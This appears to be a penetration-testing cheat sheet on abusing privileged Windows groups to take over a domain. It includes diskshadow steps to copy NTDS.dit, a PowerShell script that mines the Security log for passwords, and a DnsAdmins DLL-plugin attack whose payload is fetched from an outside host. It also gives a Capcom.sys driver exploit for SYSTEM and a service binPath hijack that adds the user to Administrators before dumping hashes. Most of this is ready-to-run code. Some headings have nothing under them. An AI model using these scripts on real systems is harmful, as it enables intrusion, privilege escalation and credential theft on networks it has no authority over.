Windows Group Privileges

Backup Operators

Membership in this group grants SeBackupPrivilege and SeRestorePrivilege. With SeBackupPrivilege enabled, a process can open and read any file on the host regardless of its DACL (backup semantics bypass the access check), which on a Domain Controller includes NTDS.dit. The privilege is present but disabled in a fresh token, so it has to be enabled before use, which is what the tooling below does.

https://github.com/giuliano108/SeBackupPrivilege

1 Import DLLs

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

2 Enable SeBackupPrivilege

# Enable
Set-SeBackupPrivilege

# Verify
Get-SeBackupPrivilege

3 Copy File

Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

Copy NTDS.dit

diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

Backup SAM + SYSTEM Hives

Extract NTDS

Event Log Reader

Check Membership Group

Searching Security Logs
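The two Event Log Reader steps above as one script: confirm the membership, then search the Security log for process-creation events whose command lines carry credentials. This is an added example, not code from the page. It assumes command-line auditing ("Include command line in process creation events") is enabled, since otherwise the CommandLine field of event 4688 is empty, and the credential regex is only a heuristic.

```powershell
# Added example (not from the page): confirm Event Log Readers membership, then mine the
# Security log for process-creation events (4688) whose command line carries credentials.
# Assumes command-line auditing is on; without it the CommandLine field is empty.

function Test-EventLogReader {
    # whoami /groups lists the token's groups with SIDs; Event Log Readers is S-1-5-32-573.
    [bool](whoami /groups | Select-String -SimpleMatch 'S-1-5-32-573')
}

function Find-CredentialsInSecurityLog {
    param(
        [int]$MaxEvents = 5000,
        # Heuristic: switches that net.exe, psexec, schtasks and friends use to pass passwords.
        [string]$Pattern = '(?i)(/user|/u:|/pass|/p:|-Password|password=)'
    )

    # Filter on EventID server-side so only 4688 records cross the API boundary.
    $events = Get-WinEvent -LogName Security -FilterXPath '*[System[EventID=4688]]' `
                           -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Read fields by name from the event XML instead of trusting positional Properties[].
        $data = ([xml]$e.ToXml()).Event.EventData.Data
        $cmd  = ($data | Where-Object Name -eq 'CommandLine').'#text'
        if ($cmd -and $cmd -match $Pattern) {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                Subject     = ($data | Where-Object Name -eq 'SubjectUserName').'#text'
                Process     = ($data | Where-Object Name -eq 'NewProcessName').'#text'
                CommandLine = $cmd
            }
        }
    }
}

if (-not (Test-EventLogReader)) {
    Write-Warning 'Current token is not in Event Log Readers; reading the Security log will fail.'
}
Find-CredentialsInSecurityLog | Format-Table -AutoSize -Wrap
```

The quick one-liner equivalent is `wevtutil qe Security /rd:true /f:text | Select-String "/user"`; the script above just does the same with named fields and a broader pattern. On a busy Domain Controller the Security log is large, so tune `-MaxEvents` rather than reading everything.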

DnsAdmins

1 Generating Malicious DLL

2 Load DLL

3 Restart Service
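The three DnsAdmins steps as one script run on the Domain Controller. This is an added example, not code from the page. The DLL itself is built elsewhere (the msfvenom line in the comments is an illustration, not the page's own payload), and the UNC path \\10.10.14.3\share\adduser.dll is a placeholder for wherever the DC's machine account can reach the file.

```powershell
# Added example (not from the page): DnsAdmins -> load an attacker-controlled DLL into dns.exe,
# which runs as SYSTEM on the DC. Assumes the current user is in DnsAdmins, a DLL was built
# elsewhere, for example
#   msfvenom -p windows/x64/exec cmd='net group "Domain Admins" <user> /add /domain' -f dll -o adduser.dll
# and is hosted where the DC's machine account can read it. The UNC path below is a placeholder.

$DllPath = '\\10.10.14.3\share\adduser.dll'   # placeholder; replace with your share
$Params  = 'HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# 1. Confirm membership and that the DNS Server service is present.
whoami /groups | Select-String 'DnsAdmins'
sc.exe qc DNS

# 2. Register the DLL as the server-level plugin. This only writes a registry value;
#    dns.exe loads the DLL the next time it starts. (dnscmd.exe <dc> /config ... targets a remote DC.)
dnscmd.exe /config /serverlevelplugindll $DllPath
reg.exe query $Params /v ServerLevelPluginDll

# 3. Restart the service so it loads the plugin. DnsAdmins membership does not by itself
#    grant stop/start rights on the service; read the SDDL first to see who does.
sc.exe sdshow DNS
sc.exe stop DNS
Start-Sleep -Seconds 3
sc.exe start DNS

# 4. Clean up: a DLL without the plugin exports keeps the DNS Server from starting cleanly,
#    so remove the value and restart again to restore name resolution on the DC.
reg.exe delete $Params /v ServerLevelPluginDll /f
sc.exe stop DNS
Start-Sleep -Seconds 3
sc.exe start DNS
```

This is a disruptive technique: while the plugin value points at the payload DLL, DNS on the Domain Controller is effectively down, which is both operationally risky and highly visible. The `ServerLevelPluginDll` value under the DNS Parameters key is also a simple thing for defenders to monitor.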

Print Operators is another highly privileged group. Its members receive SeLoadDriverPrivilege, can manage, create, share, and delete printers connected to a Domain Controller, and can log on locally to a Domain Controller and shut it down. SeLoadDriverPrivilege is the interesting part: it allows loading a signed but vulnerable kernel driver such as Capcom.sys and then exploiting it for SYSTEM. The privilege shows as Disabled in a normal token, so the loader below enables it before calling NtLoadDriver. Note that referencing the driver from a key under HKEY_CURRENT_USER, which this technique depends on, stopped working as of Windows 10 version 1803, so it only applies to older builds.

https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp

1 Compile CPP File

2 Add Capcom.sys

3 Verify the Privilege Is Enabled

4 Run Exploit

https://github.com/tandasat/ExploitCapcom
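The four Print Operators steps as one script. This is an added example, not code from the page or from the two linked projects. It assumes cl.exe (Visual Studio build tools) is on PATH, that C:\Tools holds EnableSeLoadDriverPrivilege.cpp, Capcom.sys and a compiled ExploitCapcom.exe, and that the loader reads its driver reference from HKCU\System\CurrentControlSet\CAPCOM; that key name is an assumption, so check the loader's source if your build differs.

```powershell
# Added example (not from the page or the linked projects): Print Operators -> kernel driver
# load -> SYSTEM. Assumes cl.exe is on PATH, C:\Tools holds EnableSeLoadDriverPrivilege.cpp,
# Capcom.sys and ExploitCapcom.exe, and that the loader expects the registry key below
# (assumption: verify against the loader's source).

$Tools = 'C:\Tools'
$Key   = 'HKCU\System\CurrentControlSet\CAPCOM'

# 1. Compile the loader. It resolves NtLoadDriver at runtime, so no extra link inputs are needed.
Push-Location $Tools
cl.exe /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Pop-Location

# 2. Register the driver under HKCU, which a non-admin can write. ImagePath uses the
#    NT object-manager form (\??\) and Type 1 means kernel driver.
reg.exe add $Key /v ImagePath /t REG_SZ    /d "\??\$Tools\Capcom.sys" /f
reg.exe add $Key /v Type      /t REG_DWORD /d 1 /f

# 3. Verify the privilege is in the token. It reads Disabled here; the loader enables it
#    in its own token before calling NtLoadDriver.
$priv = whoami /priv | Select-String 'SeLoadDriverPrivilege'
if (-not $priv) { throw 'SeLoadDriverPrivilege is not in the token; is this user in Print Operators?' }
$priv

# 4. Load the driver, then trigger the exploit. ExploitCapcom spawns a SYSTEM cmd.exe by
#    default, so run this from an interactive session (e.g. RDP) or modify it to run a payload.
& "$Tools\EnableSeLoadDriverPrivilege.exe"
& "$Tools\ExploitCapcom.exe"

# 5. Remove the registry reference afterwards. The driver stays loaded until reboot.
reg.exe delete $Key /f
```

If ExploitCapcom reports that it cannot open the device, the driver did not load: re-check the ImagePath value, that Capcom.sys is actually at that path, and the Windows build (see the 1803 note above).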

Server Operators

Allows members to administer Windows servers without being Domain Admins. It is a highly privileged group whose members can log on locally to servers, including Domain Controllers, and control services on them, which is what the service-binary hijack below abuses.

1 Query Service

2 Service Permissions Check

https://learn.microsoft.com/en-us/sysinternals/downloads/psservice

3 Modify Service Binary Path

4 Start / Stop Service

5 Dump Hashes
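The five Server Operators steps as one script, run on the target server as a member of the group. This is an added example, not code from the page. The service name is a placeholder: step 2 is where you confirm that the chosen service's ACL actually grants Server Operators the change-config and start/stop rights the rest of the script relies on.

```powershell
# Added example (not from the page): Server Operators -> hijack a service binary path to add
# the current user to local Administrators. $Service is a placeholder; pick a service whose
# ACL (step 2) grants Server Operators config change and start/stop, and whose account is
# LocalSystem so the hijacked command runs with enough rights.

$Service = 'SomeService'                    # placeholder; replace after step 2
$User    = "$env:USERDOMAIN\$env:USERNAME"

# 1. Query the service and keep the original binary path so it can be restored.
$qc = sc.exe qc $Service
$OriginalPath = ($qc | Select-String 'BINARY_PATH_NAME\s*:\s*(.+)$').Matches[0].Groups[1].Value.Trim()
$qc

# 2. Check the service ACL. sc sdshow prints raw SDDL; Sysinternals PsService prints it
#    readably: psservice.exe security $Service. Look for Server Operators (S-1-5-32-549)
#    with DC (change config) and RP/WP (start/stop).
sc.exe sdshow $Service

# 3. Point the binary path at a command that adds us to local Administrators.
#    sc.exe needs the space after 'binPath='.
sc.exe config $Service binPath= "cmd.exe /c net localgroup Administrators $User /add"

# 4. Cycle the service. The SCM runs the new binPath under the service account, which is what
#    executes the command. The start then "fails" because cmd.exe is not a real service; expected.
sc.exe stop $Service
Start-Sleep -Seconds 2
sc.exe start $Service
Start-Sleep -Seconds 2
net localgroup Administrators

# 5. Restore the original path so the service works again. If $OriginalPath contained embedded
#    quotes, check it with 'sc.exe qc' afterwards.
sc.exe config $Service binPath= "$OriginalPath"
```

The new Administrators membership only applies to a fresh token, so log off and on (or open a new session) before using it. For the final step, with local administrator rights on a Domain Controller, Impacket's `secretsdump.py <domain>/<user>@<dc>` dumps the NTDS hashes remotely over DRSUAPI, or the SAM/SYSTEM hives can be saved locally with `reg save` as shown in the Backup Operators section.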
